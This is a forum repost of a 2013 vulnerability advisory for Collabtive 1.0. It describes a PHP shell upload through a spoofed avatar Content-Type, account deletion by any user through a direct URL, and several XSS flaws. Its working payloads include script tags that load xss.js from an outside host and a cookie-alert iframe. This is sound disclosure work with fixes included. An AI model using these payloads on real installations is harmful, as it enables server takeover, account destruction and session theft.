Byte-ul Posted July 24, 2013 Report Posted July 24, 2013 Collabtive version 1.0 suffers from cross site scripting, remote shell upload, and arbitrary account deletion vulnerabilities.Authored by Enrico CinquiniSource: Collabtive 1.0 XSS / Shell Upload / Privilege Escalation ? Packet Storm=============================================- Release date: July 22th, 2013- Discovered by: Enrico Cinquini- Severity: High============================================= I. VULNERABILITY-------------------------Collabtive multiple vulnerabilities. II. INTRODUCTION-------------------------The last version of Collabtive (1.0) is affected by multiplevulnerabilities. IV. DESCRIPTION-------------------------1) UPLOAD PHP FILE INSIDE AVATAR:In the following function:https://hostname/secprj/manageuser.php?action=editit's possible to upload a php file inside avatar by modifying theContent-Typeas following:Content-Type: image/jpegThe file will be uploaded inside the standard directory and encoded with asix-characters number at the end of the file, like the following example:https://hostname/secprj/files/standard/avatar/uploadedshell_104185.phpIt's really fast to enumerate all the possibility and to execute the fileuploaded.This vulnerability was identified in older releases, but it's still present.2) ACCOUNT DELETIONIt's possible to delete any account from every user, by calling thefollowing URL:https://hostname/secprj/manageuser.php?action=del&id=5By setting the value "del" to parameter "action", the account with settedID will bedeleted, even if will apper an error message.An "User" account with no privilege can delete all kind of account,including Administrators.3) CROSS SITE SCRITPING - CHAT:The application is vulnerable to XSS attack in the managechat.php page. Theparameter affected is 'userto':https://hostname/secprj/managechat.php?userto=<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>&uid=24) CROSS SITE SCRITPING - TIMETRACKERThe page managetimetracker.php is affected by Cross Site Scriptingvulnerability.The POST parameters 'start' and 'end' are vulnerable, for example, to thefollowing XSS:"><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>5) CROSS SITE SCRITPING - Multiple vulnerabilities:The application is vulnerable to XSS attack in different pages:manageproject.phpmanagemilestone.phpmanagetask.phpmanagemessage.phpTo exploit the vulnerability it's necessary to set a new object name(project, milestone,task, message) like the following example:"><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>the script will be executed in the same page, and in dashboard,too.6) CROSS SITE SCRITPING - PROFILEThe page manageuser.php?action=editform is affected by Cross Site Scriptingvulnerability.All the profile fields are vulnerable, for example, to the followinginjection:<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> VI. BUSINESS IMPACT-------------------------An attacker could upload malicious file, delete accounts and perform XSSattacks. VII. SYSTEMS AFFECTED-------------------------Version 1.0 is vulnerable. VIII. SOLUTION-------------------------It's necessary to:- implement a strong upload filter to prevent the upload of malicious file- implement an input validation mechanism to avoid being vulnerable to XSSinjection- review and correct users profiling to prevent a user can delete otheraccounts IX. REFERENCES-------------------------Collabtive website:http://collabtive.o-dyn.de X. CREDITS-------------------------The vulnerability has been discovered by:Enrico Cinquini enrico(dot)cinquini(at)gmail(dot)com XI. VULNERABILITY HISTORY-------------------------June 20th, 2013: Vulnerability identificationJune 21th, 2013: Vendor notificationJuly 22th, 2013: Vulnerability disclosure XII. LEGAL NOTICES-------------------------The information contained within this advisory is supplied "as-is" with nowarranties or guarantees of fitness of use or otherwise. We accept noresponsibility for any damage caused by the use or misuseof this information. Quote
